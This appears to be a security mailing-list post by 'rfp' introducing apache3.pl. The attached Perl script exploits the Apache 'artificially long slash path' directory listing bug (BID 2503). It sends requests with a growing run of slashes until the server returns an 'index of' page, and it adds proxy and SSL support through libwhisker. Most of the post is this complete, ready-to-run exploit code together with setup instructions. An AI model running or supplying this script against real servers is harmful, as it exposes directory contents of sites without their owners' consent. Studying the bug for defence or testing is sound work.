Well, I might as well have my hand in recoding this exploit. ;)
Attached is apache3.pl, which is a recoded version of Siberian's recode of
Matt Watchinski's exploit. My version uses libwhisker, which allows the
exploit to have HTTP/1.1, proxy, and SSL support automatically. Basic
support (not including SSL) should work for any platform having Perl.
To use the attached exploit, you'll need a copy of libwhisker. The latest
is pr3, downloadable at:
http://www.wiretrip.net/rfp/p/doc.asp?id=21&iface=7
You can either grab the developer tarball and build/install it, or just
grab the libwhisker.pm, put it in the same directory as the apache3.pl,
and just run apache3.pl--perl will use the libwhisker.pm module in the
same directory.
For SSL support, you'll need either Crypt::SSLeay or Net::SSLeay installed
(which may require OpenSSL). I think ActiveState has ported
Crypt::SSLeay/Net::SSL (not Net::SSLeay) over to Windows, so Windows users
should have SSL support as well.
If anyone is interested in libwhisker and further using it, consider
joinging the whisker-devel mailing list at:
http://sourceforge.net/projects/whisker/
And as always, feedback always welcome. See everyone at BlackHat/DefCon!
- rfp
#!/usr/bin/perl
#
# orginal by farm9, Inc. (copyright 2001)
# then modified by Siberian (www.sentry-labs.com)
# with more modifications by rfp (www.wiretrip.net/rfp/)
#
##########################################################################
use libwhisker;
use Getopt::Std;
# apache3.pl
# this exploit was modified to use the libwhisker library, which gives
# HTTP/1.1, proxy, and SSL support. Plus, small other changes.
$|++;
my (%hin,%hout,%args);
print "Apache Artificially Long Slash Path Directory Listing Exploit\n";
print "SecurityFocus BID 2503\n\n";
print "Original exploit code written by Matt Watchinski (www.farm9.com)\n";
print "Rewritten and fixed by Siberian (www.sentry-labs.com)\n";
print "Moved to libwhisker by rfp\n\n";
getopts("p:L:H:sP:R:h:",\%args);
if($args{h} eq ''){
print 'Usage: ./apache3.pl <options>, where options:',"\n";
print '-h host host to scan (must be specified)',"\n";
print '-p ## host port (default: 80)',"\n";
print '-L ## low end/start of range (default: 1)',"\n";
print '-H ## high end/end of range (default: 8192)',"\n";
print '-P host HTTP proxy via host',"\n";
print '-R ## HTTP proxy port (default: 80)',"\n";
print '-s use SSL (can\'t be used with proxy)',"\n";
exit 0;
}
$low = $args{L} || 1;
$high = $args{H} || 8192;
&lw::http_init_request(\%hin); # setup our request hash
$hin{'whisker'}->{'host'}= $args{h};
$hin{'whisker'}->{'port'}= $args{p} || 80;
if(defined $args{s}){
$hin{'whisker'}->{'ssl'} = 1;
if(defined $args{P}){
print "SSL not currently compatible with proxy\n";
exit 1;
}
}
if(defined $args{'P'}){
$hin{'whisker'}->{'proxy_host'}=$args{P};
$hin{'whisker'}->{'proxy_port'}=$args{R} || 80;
print "Using proxy host $hin{'whisker'}->{'proxy_host'} on ";
print "port $hin{'whisker'}->{'proxy_port'}\n";
}
&lw::http_fixup_request(\%hin); # fix any HTTP requirements
for($c=$low; $c<=$high; $c++){
$hin{'whisker'}->{'uri'} = '/' x $c;
if(&lw::http_do_request(\%hin,\%hout)){
print "Error: $hout{'whisker'}->{'error'}\n";
exit 1;
} else {
if($hout{'whisker'}->{'http_resp'} == 200 &&
$hout{'whisker'}->{'data'}=~/index of/i){
print "Found result using $c slashes.\n";
exit 0;
}
}
print "."; # for status
}
print "\nNot vulnerable (perhaps try a different range).\n";
